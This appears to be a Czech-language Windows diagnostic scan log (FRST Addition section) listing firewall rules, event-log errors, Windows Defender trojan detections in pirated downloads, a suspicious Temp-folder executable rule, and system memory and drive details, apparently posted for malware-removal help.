FirewallRules: [UDP Query User{06573978-65FB-4CBB-BFE9-E4D12F3243F8}C:\program files (x86)\steam\steamapps\common\fallout 4\creationkit.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\fallout 4\creationkit.exe
FirewallRules: [DNS Server Forward Rule - TCP - 68856003-c685-4c51-840f-9758cecf39c8 - 0] => (Allow) LPort=53
FirewallRules: [DNS Server Forward Rule - UDP - 68856003-c685-4c51-840f-9758cecf39c8 - 0] => (Allow) LPort=53
FirewallRules: [{01A62426-B1D7-4724-882A-9AC351096889}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Euro Truck Simulator 2\bin\win_x64\eurotrucks2.exe
FirewallRules: [{C2A73B52-07DF-4072-BD5B-3F60806F0B96}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Euro Truck Simulator 2\bin\win_x64\eurotrucks2.exe
FirewallRules: [{B792B815-E781-4E53-ABAD-7B7B256DBB8C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Euro Truck Simulator 2\bin\win_x86\eurotrucks2.exe
FirewallRules: [{E773251D-03B4-4B55-AE32-E6928819C4FB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Euro Truck Simulator 2\bin\win_x86\eurotrucks2.exe
FirewallRules: [DNS Server Forward Rule - TCP - bbc2df18-4931-49bc-b29a-c291fecb1392 - 0] => (Allow) LPort=53
FirewallRules: [DNS Server Forward Rule - UDP - bbc2df18-4931-49bc-b29a-c291fecb1392 - 0] => (Allow) LPort=53
FirewallRules: [{F6035256-A96A-437F-9A29-E03F9C9B8B5C}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{53E44A7B-DD43-49AF-9B44-668628E4D42F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{0A977731-26C9-46E4-A5B4-F8B2A2AD3885}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{618C7A6D-56E4-4606-81D9-A2E8DA664CAC}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{501E6677-580B-4D7C-BF92-908DA76C1D27}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
FirewallRules: [{9BD1FECD-8F49-4C08-9EB3-5A643C6B7538}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{9A2B8971-3189-4E62-91E0-4B405E6652A0}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{C218F8B5-E452-4505-B39C-E016080BEA51}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{015CDE3C-96A8-4BDF-ABE6-4006948F8C2F}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{499F4936-A2DE-4DA0-86CB-C8C23C45D4A4}] => (Allow) C:\Program Files (x86)\FormatFactory\FormatFactory.exe
FirewallRules: [{2688D78B-6C19-4494-A1AD-2C9A8D9302A9}] => (Allow) C:\Program Files (x86)\FormatFactory\FFModules\Encoder\Doc\EBookCodec.exe
FirewallRules: [{E886E23F-1CFE-443C-8A43-E30C22D71523}] => (Allow) C:\Program Files (x86)\FormatFactory\FormatFactory.exe
FirewallRules: [{30BA75DE-33C1-483C-A276-8265F4086C14}] => (Allow) C:\Program Files (x86)\FormatFactory\FFModules\Encoder\Doc\EBookCodec.exe
FirewallRules: [{6158E4AA-5314-46DA-8C73-1E23EC90F3C6}] => (Allow) C:\Program Files (x86)\FormatFactory\FormatFactory.exe
FirewallRules: [{84E85EBF-AB99-4ED3-944A-022AE92B5E4E}] => (Allow) C:\Program Files (x86)\FormatFactory\FFModules\Encoder\Doc\EBookCodec.exe
FirewallRules: [{FD3F0858-8AC4-40E4-9629-1BEF0FAAF122}] => (Allow) C:\Program Files (x86)\FormatFactory\FFModules\Package\PTInstOnline.exe
FirewallRules: [{D01DCDA8-8597-40F8-A1D0-4E79D7E49AF7}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\War Robots\WarRobots.exe
FirewallRules: [{6498DED0-E49D-4573-ADEE-B50574AC62DE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\War Robots\WarRobots.exe
FirewallRules: [{128F9E5E-25E1-4086-B196-4DA6C06F5384}] => (Allow) C:\Program Files (x86)\DroidCam\DroidCamApp.exe
FirewallRules: [{CCCAC37E-94E7-4EE5-B292-1EE2BE1563E3}] => (Allow) C:\Program Files (x86)\DroidCam\DroidCamApp.exe
FirewallRules: [{004D02A7-18A0-4322-BB71-3AF3ECB956DA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Saints Row IV\SaintsRowIV.exe
FirewallRules: [{7E71EB4D-24F6-4A4C-ABDE-7749EC8026BE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Saints Row IV\SaintsRowIV.exe
FirewallRules: [{CF7F6AD4-62DE-4D89-A31B-CCFF45E41804}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Thief\Binaries\Win64\Shipping-ThiefGame.exe
FirewallRules: [{1976CC87-A751-491B-A35D-C5C86651D6D3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Thief\Binaries\Win64\Shipping-ThiefGame.exe
FirewallRules: [{90F76697-3F1F-4BA0-B201-3AB2FEF39514}] => (Allow) E:\Hry\steamapps\common\Max Payne 3\Max Payne 3\MaxPayne3.exe
FirewallRules: [{12D48D32-DAD0-4D3C-BBAF-BC76C089BDE8}] => (Allow) E:\Hry\steamapps\common\Max Payne 3\Max Payne 3\MaxPayne3.exe
FirewallRules: [{9E86081D-7942-4A6F-ABD5-6D742F121B3B}] => (Allow) E:\Hry\steamapps\common\SleepingDogs\HKShip.exe
FirewallRules: [{575F8ACA-19FB-4286-B746-1BF6205E3BB4}] => (Allow) E:\Hry\steamapps\common\SleepingDogs\HKShip.exe
FirewallRules: [{AF423A76-96B9-468A-BC6A-94CFC114CD95}] => (Allow) E:\Hry\steamapps\common\The Forest\TheForest.exe
FirewallRules: [{259DF12D-7655-41AE-A47B-C2351B7A0473}] => (Allow) E:\Hry\steamapps\common\The Forest\TheForest.exe
FirewallRules: [{CEC7BC25-2E76-4B6C-A8D5-D047949BFA60}] => (Allow) E:\Hry\steamapps\common\The Forest\TheForestVR.exe
FirewallRules: [{EC900147-C4C8-4C5C-BB38-96FDFB34F7BC}] => (Allow) E:\Hry\steamapps\common\The Forest\TheForestVR.exe
FirewallRules: [{D67A734E-6464-4606-9603-5A0BB977F899}] => (Allow) E:\Hry\steamapps\common\FarCry5\bin\FarCry5.exe
FirewallRules: [{813F87FE-DBF1-45D2-9E65-96F29580518E}] => (Allow) E:\Hry\steamapps\common\FarCry5\bin\FarCry5.exe
FirewallRules: [{AE687531-84DF-4848-A306-4341BCD8FB39}] => (Allow) C:\Program Files\Opera\54.0.2952.64\opera.exe
FirewallRules: [DNS Server Forward Rule - TCP - f2bbcd59-5643-4910-a61e-d3e36d72daa2 - 0] => (Allow) LPort=53
FirewallRules: [DNS Server Forward Rule - UDP - f2bbcd59-5643-4910-a61e-d3e36d72daa2 - 0] => (Allow) LPort=53
FirewallRules: [{41E26A1D-3F84-4B04-AE33-FC41AC687221}] => (Allow) C:\Program Files\Opera\54.0.2952.71\opera.exe
FirewallRules: [{4683F2F4-4F17-4D47-B52C-E4C7B153E294}] => (Allow) E:\Hry\steamapps\common\FarCry5\bin\FarCry5.exe
FirewallRules: [{6E962D5A-DF41-4685-9D3D-3BCCD5024E7E}] => (Allow) E:\Hry\steamapps\common\FarCry5\bin\FarCry5.exe
FirewallRules: [{12C47B9E-700C-40D4-BA37-DE9B3F763531}] => (Allow) E:\Hry\steamapps\common\FarCry5\bin\ArcadeEditor64.exe
FirewallRules: [{083FBA20-D9B6-4983-8030-358E844AA1EC}] => (Allow) E:\Hry\steamapps\common\FarCry5\bin\ArcadeEditor64.exe
FirewallRules: [{63C7684D-1DE7-498F-B226-D6F9AAE1AA15}] => (Allow) C:\Users\cheat\AppData\Local\Temp\spoolsv\msvcr.exe
FirewallRules: [{408E21AC-ADA9-453C-BA7C-4E90B383AC2A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Euro Truck Simulator 2\bin\win_x64\eurotrucks2.exe
FirewallRules: [{1281EC7B-357B-4DBD-91A9-A4F8AC172F5C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Euro Truck Simulator 2\bin\win_x64\eurotrucks2.exe
FirewallRules: [{DA76BAF2-98D5-4765-9BD2-AABEF1594881}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Euro Truck Simulator 2\bin\win_x86\eurotrucks2.exe
FirewallRules: [{4476D818-95E9-46D8-9C53-7F794012A80A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Euro Truck Simulator 2\bin\win_x86\eurotrucks2.exe

==================== Restore Points =========================

12-08-2018 18:44:27 Naplánovaný kontrolní bod
21-08-2018 21:00:26 Installed 4K Video Downloader 4.4

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (08/24/2018 09:33:18 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program explorer.exe verze 10.0.17134.165 přestal spolupracovat se systémem Windows a byl ukončen. Chcete-li zjistit, zda je k dispozici více informací o tomto problému, vyhledejte historii problému v ovládacím panelu Zabezpečení a údržba.

ID procesu: 1f34

Čas spuštění: 01d43bdd792b17a0

Čas ukončení: 0

Cesta k aplikaci: C:\Windows\explorer.exe

ID hlášení: 5d42582a-199d-4810-8965-cbf5c4c48003

Úplný název balíčku s chybou:

ID aplikace související s balíčkem s chybou:

Error: (08/23/2018 11:51:24 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program MicrosoftEdgeCP.exe verze 11.0.17134.228 přestal spolupracovat se systémem Windows a byl ukončen. Chcete-li zjistit, zda je k dispozici více informací o tomto problému, vyhledejte historii problému v ovládacím panelu Zabezpečení a údržba.

ID procesu: 3dd0

Čas spuštění: 01d43b2142b2ed32

Čas ukončení: 7

Cesta k aplikaci: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

ID hlášení: badbb3bc-3feb-4820-aad7-19cd89586869

Úplný název balíčku s chybou: Microsoft.MicrosoftEdge_42.17134.1.0_neutral__8wekyb3d8bbwe

ID aplikace související s balíčkem s chybou: ContentProcess

Error: (08/23/2018 10:38:42 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Název chybující aplikace: utorrent.exe, verze: 2.2.1.25534, časové razítko: 0x4e4594ce
Název chybujícího modulu: GDI32.dll, verze: 10.0.17134.1, časové razítko: 0xe8b78880
Kód výjimky: 0xc000041d
Posun chyby: 0x000063a7
ID chybujícího procesu: 0xc08
Čas spuštění chybující aplikace: 0x01d43adbaf4cc91b
Cesta k chybující aplikaci: C:\Users\cheat\AppData\Roaming\uTorrent\utorrent.exe
Cesta k chybujícímu modulu: C:\Windows\System32\GDI32.dll
ID zprávy: fdc4c724-1693-4558-8e14-aa97a232ff54
Úplný název chybujícího balíčku:
ID aplikace související s chybujícím balíčkem:

Error: (08/23/2018 09:11:16 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program WinX_YouTube_Downloader.exe verze 4.2.0.0 přestal spolupracovat se systémem Windows a byl ukončen. Chcete-li zjistit, zda je k dispozici více informací o tomto problému, vyhledejte historii problému v ovládacím panelu Zabezpečení a údržba.

ID procesu: 396c

Čas spuštění: 01d43b1383ace8e1

Čas ukončení: 4294967295

Cesta k aplikaci: C:\Program Files (x86)\Digiarty\WinX_YouTube_Downloader\WinX_YouTube_Downloader.exe

ID hlášení: c5898523-40b6-43df-b1af-e52e508d586f

Úplný název balíčku s chybou:

ID aplikace související s balíčkem s chybou:

Error: (08/21/2018 08:56:58 PM) (Source: Application Error) (EventID: 1005) (User: )
Description: Systém Windows nemůže získat přístup k souboru z jednoho z těchto důvodů:
došlo k problému s připojením k síti, s diskem, na kterém je soubor uložen, nebo
s ovladači ukládání nainstalovanými v tomto počítači; nebo disk chybí.
Systém Windows kvůli této chybě ukončil program Direct Video Downloader.

Program: Direct Video Downloader
Soubor:

Hodnota chyby je uvedena v části Další údaje.
Akce uživatele
1. Otevřete soubor znovu.
Může se jednat o dočasný problém, který se při novém spuštění programu nebude opakovat.
2.
Pokud k souboru stále nelze získat přístup a:
- Nachází se v síti,
měl by správce sítě ověřit, zda nedošlo k problému se sítí a zda lze server kontaktovat.
- Je na vyměnitelném disku (například disketě nebo disku CD-ROM), ověřte, zda je disk správně vložen do počítače.
3. Zkontrolujte a opravte systém souborů pomocí nástroje CHKDSK. Ten lze spustit tak, že kliknete na tlačítko Start a příkaz Spustit, zadáte příkaz CMD a kliknete na tlačítko OK. Do příkazového řádku zadejte příkaz CHKDSK /F a stiskněte klávesu ENTER.
4. Pokud potíže potrvají, obnovte soubor ze záložní kopie.
5. Zjistěte, zda lze otevřít jiné soubory na stejném disku. Pokud ne, může být disk poškozen. Jedná-li se o pevný disk, obraťte se na správce nebo na dodavatele počítačového hardwaru
se žádostí o pomoc.

Další údaje
Hodnota chyby: 00000000
Typ disku: 0

Error: (08/21/2018 08:56:58 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Název chybující aplikace: dvd212.exe, verze: 2.12.0.0, časové razítko: 0x589e33c8
Název chybujícího modulu: shell32.dll, verze: 10.0.17134.228, časové razítko: 0x02013caa
Kód výjimky: 0xc000001d
Posun chyby: 0x00000000000e8430
ID chybujícího procesu: 0xa44
Čas spuštění chybující aplikace: 0x01d439808f13b5cd
Cesta k chybující aplikaci: C:\Program Files (x86)\Direct Video Downloader\dvd212.exe
Cesta k chybujícímu modulu: C:\Windows\System32\shell32.dll
ID zprávy: 4faeffa8-91b4-4367-bfe7-54ab23061af9
Úplný název chybujícího balíčku:
ID aplikace související s chybujícím balíčkem:

Error: (08/21/2018 08:56:46 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Název chybující aplikace: dvd212.exe, verze: 2.12.0.0, časové razítko: 0x589e33c8
Název chybujícího modulu: shell32.dll, verze: 10.0.17134.228, časové razítko: 0x02013caa
Kód výjimky: 0xc0000005
Posun chyby: 0x00000000000931b4
ID chybujícího procesu: 0xa44
Čas spuštění chybující aplikace: 0x01d439808f13b5cd
Cesta k chybující aplikaci: C:\Program Files (x86)\Direct Video Downloader\dvd212.exe
Cesta k chybujícímu modulu: C:\Windows\System32\shell32.dll
ID zprávy: 7de68ca9-e037-40b2-9ee2-dc83d2ec23e0
Úplný název chybujícího balíčku:
ID aplikace související s chybujícím balíčkem:

Error: (08/21/2018 08:56:46 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Aplikace: dvd212.exe
Verze Framework: v4.0.30319
Popis: Proces byl ukončen z důvodu neošetřené výjimky.
Informace o výjimce: System.AccessViolationException
na System.Windows.Forms.UnsafeNativeMethods+Shell32.SHBrowseForFolder(BROWSEINFO)
na System.Windows.Forms.FolderBrowserDialog.RunDialog(IntPtr)
na System.Windows.Forms.CommonDialog.ShowDialog(System.Windows.Forms.IWin32Window)
na  .()
na System.Windows.Forms.Control.OnClick(System.EventArgs)
na System.Windows.Forms.Control.WmMouseUp(System.Windows.Forms.Message ByRef, System.Windows.Forms.MouseButtons, Int32)
na System.Windows.Forms.Control.WndProc(System.Windows.Forms.Message ByRef)
na System.Windows.Forms.NativeWindow.Callback(IntPtr, Int32, IntPtr, IntPtr)
na System.Windows.Forms.UnsafeNativeMethods.DispatchMessageW(MSG ByRef)
na System.Windows.Forms.Application+ComponentManager.System.Windows.Forms.UnsafeNativeMethods.IMsoComponentManager.FPushMessageLoop(IntPtr, Int32, Int32)
na System.Windows.Forms.Application+ThreadContext.RunMessageLoopInner(Int32, System.Windows.Forms.ApplicationContext)
na System.Windows.Forms.Application+ThreadContext.RunMessageLoop(Int32, System.Windows.Forms.ApplicationContext)
na  .()


System errors:
=============
Error: (08/24/2018 09:08:05 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: Nastavení oprávnění specifické pro aplikaci neuděluje oprávnění Místní Spuštění pro serverovou aplikaci COM s identifikátorem CLSID
Windows.SecurityCenter.WscBrokerManager
a APPID
Není k dispozici
uživateli NT AUTHORITY\SYSTEM (SID: S-1-5-18) z adresy LocalHost (pomocí LRPC) běžící v kontejneru aplikací Není k dispozici – SID (Není k dispozici). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (08/24/2018 09:06:49 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-1JRDM4L)
Description: Nastavení oprávnění specifické pro aplikaci neuděluje oprávnění Místní Aktivace pro serverovou aplikaci COM s identifikátorem CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
a APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
uživateli DESKTOP-1JRDM4L\cheat (SID: S-1-5-21-1409225181-4065645274-1912239689-1002) z adresy LocalHost (pomocí LRPC) běžící v kontejneru aplikací Není k dispozici – SID (Není k dispozici). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (08/24/2018 09:06:35 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-1JRDM4L)
Description: Nastavení oprávnění specifické pro aplikaci neuděluje oprávnění Místní Aktivace pro serverovou aplikaci COM s identifikátorem CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
a APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
uživateli DESKTOP-1JRDM4L\cheat (SID: S-1-5-21-1409225181-4065645274-1912239689-1002) z adresy LocalHost (pomocí LRPC) běžící v kontejneru aplikací Není k dispozici – SID (Není k dispozici). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (08/24/2018 09:06:14 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-1JRDM4L)
Description: Nastavení oprávnění specifické pro aplikaci neuděluje oprávnění Místní Aktivace pro serverovou aplikaci COM s identifikátorem CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
a APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
uživateli DESKTOP-1JRDM4L\cheat (SID: S-1-5-21-1409225181-4065645274-1912239689-1002) z adresy LocalHost (pomocí LRPC) běžící v kontejneru aplikací Není k dispozici – SID (Není k dispozici). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (08/24/2018 09:06:08 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-1JRDM4L)
Description: Nastavení oprávnění specifické pro aplikaci neuděluje oprávnění Místní Aktivace pro serverovou aplikaci COM s identifikátorem CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
a APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
uživateli DESKTOP-1JRDM4L\cheat (SID: S-1-5-21-1409225181-4065645274-1912239689-1002) z adresy LocalHost (pomocí LRPC) běžící v kontejneru aplikací Není k dispozici – SID (Není k dispozici). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (08/24/2018 09:05:50 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: Nastavení oprávnění specifické pro aplikaci neuděluje oprávnění Místní Aktivace pro serverovou aplikaci COM s identifikátorem CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
a APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
uživateli NT AUTHORITY\LOCAL SERVICE (SID: S-1-5-19) z adresy LocalHost (pomocí LRPC) běžící v kontejneru aplikací Není k dispozici – SID (Není k dispozici). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (08/24/2018 09:05:50 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: Nastavení oprávnění specifické pro aplikaci neuděluje oprávnění Místní Aktivace pro serverovou aplikaci COM s identifikátorem CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
a APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
uživateli NT AUTHORITY\LOCAL SERVICE (SID: S-1-5-19) z adresy LocalHost (pomocí LRPC) běžící v kontejneru aplikací Není k dispozici – SID (Není k dispozici). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (08/24/2018 09:02:14 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-1JRDM4L)
Description: Nastavení oprávnění specifické pro aplikaci neuděluje oprávnění Místní Aktivace pro serverovou aplikaci COM s identifikátorem CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
a APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
uživateli DESKTOP-1JRDM4L\cheat (SID: S-1-5-21-1409225181-4065645274-1912239689-1002) z adresy LocalHost (pomocí LRPC) běžící v kontejneru aplikací Není k dispozici – SID (Není k dispozici). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.


Windows Defender:
===================================
Date: 2018-06-17 01:01:52.620
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/CryptInject
ID: 2147725859
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_E:\Stahování\seed\4K Video Downloader\4K Video Downloader.exe
Původ zjišťování: Místní počítač
Typ zjišťování: Konkrétní
Zdroj zjišťování: Ochrana v reálném čase
Uživatel: DESKTOP-1JRDM4L\cheat
Název procesu: C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
Verze podpisu: AV: 1.269.1385.0, AS: 1.269.1385.0, NIS: 0.0.0.0
Verze modulu: AM: 1.1.14901.4, NIS: 0.0.0.0

Date: 2018-06-17 01:01:13.606
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/CryptInject
ID: 2147725859
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_E:\Stahování\seed\4K Video Downloader\4K Video Downloader.exe
Původ zjišťování: Místní počítač
Typ zjišťování: Konkrétní
Zdroj zjišťování: Ochrana v reálném čase
Uživatel: DESKTOP-1JRDM4L\cheat
Název procesu: C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
Verze podpisu: AV: 1.269.1385.0, AS: 1.269.1385.0, NIS: 1.269.1385.0
Verze modulu: AM: 1.1.14901.4, NIS: 1.1.14901.4

Date: 2018-06-17 01:00:57.116
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/CryptInject
ID: 2147725859
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_E:\Stahování\seed\4K Video Downloader\4K Video Downloader.exe
Původ zjišťování: Místní počítač
Typ zjišťování: Konkrétní
Zdroj zjišťování: Ochrana v reálném čase
Uživatel: DESKTOP-1JRDM4L\cheat
Název procesu: C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
Verze podpisu: AV: 1.269.1385.0, AS: 1.269.1385.0, NIS: 1.269.1385.0
Verze modulu: AM: 1.1.14901.4, NIS: 1.1.14901.4

Date: 2018-06-17 01:00:23.631
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/CryptInject
ID: 2147725859
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_E:\Stahování\NOT COMPLETE\4K Video Downloader\4K Video Downloader.exe
Původ zjišťování: Místní počítač
Typ zjišťování: Konkrétní
Zdroj zjišťování: Ochrana v reálném čase
Uživatel: DESKTOP-1JRDM4L\cheat
Název procesu: C:\Users\cheat\AppData\Roaming\uTorrent\utorrent.exe
Verze podpisu: AV: 1.269.1385.0, AS: 1.269.1385.0, NIS: 1.269.1385.0
Verze modulu: AM: 1.1.14901.4, NIS: 1.1.14901.4

Date: 2018-06-13 14:13:48.740
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: VirTool:Win32/Obfuscator
ID: 2147584956
Závažnost: Vážné
Kategorie: Nástroj
Cesta: file:_E:\Stahování\seed\Crysis.3.Update.v1.3.INTERNAL-RELOADED\Crack\AEyrC.dll
Původ zjišťování: Místní počítač
Typ zjišťování: Konkrétní
Zdroj zjišťování: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze podpisu: AV: 1.269.1121.0, AS: 1.269.1121.0, NIS: 1.269.1121.0
Verze modulu: AM: 1.1.14901.4, NIS: 1.1.14901.4

Date: 2018-06-12 12:09:50.000
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo chybu při pokusu o aktualizaci podpisů.
Nová verze podpisu:
Předchozí verze podpisu: 1.269.1068.0
Zdroj aktualizace: Server Microsoft Update
Typ podpisu: Antivirový program
Typ aktualizace: Úplné
Uživatel: NT AUTHORITY\SYSTEM
Aktuální verze modulu:
Předchozí verze modulu: 1.1.14901.4
Kód chyby: 0x80240438
Popis chyby :Při zjišťování aktualizací došlo k neočekávaným potížím. Informace o instalaci nebo řešení potíží s aktualizacemi naleznete v nápovědě a podpoře.

Date: 2018-06-10 16:44:09.568
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo chybu při pokusu o načtení podpisů a pokusí se o obnovení sady podpisů, jejichž správnost je potvrzena.
Podpisy, které se měly načíst: Aktuální
Kód chyby: 0x80070002
Popis chyby: Systém nemůže nalézt uvedený soubor.
Verze podpisu: 0.0.0.0;0.0.0.0
Verze modulu: 0.0.0.0

Date: 2018-06-10 14:56:29.589
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo chybu při pokusu o aktualizaci podpisů.
Nová verze podpisu:
Předchozí verze podpisu: 1.269.1000.0
Zdroj aktualizace: Server Microsoft Update
Typ podpisu: Antivirový program
Typ aktualizace: Úplné
Uživatel: NT AUTHORITY\SYSTEM
Aktuální verze modulu:
Předchozí verze modulu: 1.1.14901.4
Kód chyby: 0x80070643
Popis chyby :Při instalaci došlo k závažné chybě.

Date: 2018-06-04 22:18:15.589
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo chybu při pokusu o aktualizaci podpisů.
Nová verze podpisu:
Předchozí verze podpisu: 1.269.600.0
Zdroj aktualizace: Server Microsoft Update
Typ podpisu: Antivirový program
Typ aktualizace: Úplné
Uživatel: NT AUTHORITY\SYSTEM
Aktuální verze modulu:
Předchozí verze modulu: 1.1.14901.4
Kód chyby: 0x8024402c
Popis chyby :Při zjišťování aktualizací došlo k neočekávaným potížím. Informace o instalaci nebo řešení potíží s aktualizacemi naleznete v nápovědě a podpoře.

CodeIntegrity:
===================================

Date: 2018-08-24 21:25:32.259
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2018-08-24 21:25:32.258
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2018-08-24 21:21:50.483
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2018-08-24 21:21:50.481
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2018-08-24 21:21:02.848
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2018-08-24 21:21:02.847
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2018-08-24 21:13:52.674
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2018-08-24 21:13:52.673
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

==================== Memory info ===========================

Processor: Intel(R) Core(TM) i7-4770K CPU @ 3.50GHz
Percentage of memory in use: 29%
Total physical RAM: 16321.84 MB
Available physical RAM: 11556.15 MB
Total Virtual: 18753.84 MB
Available Virtual: 12085.5 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:465.16 GB) (Free:53.21 GB) NTFS
Drive e: (Stahování) (Fixed) (Total:1863.01 GB) (Free:345.27 GB) NTFS ==>[system with boot components (obtained from drive)]

\\?\Volume{2be4c9f9-1161-42f2-a704-311565b38549}\ (Obnovení) (Fixed) (Total:0.49 GB) (Free:0.1 GB) NTFS
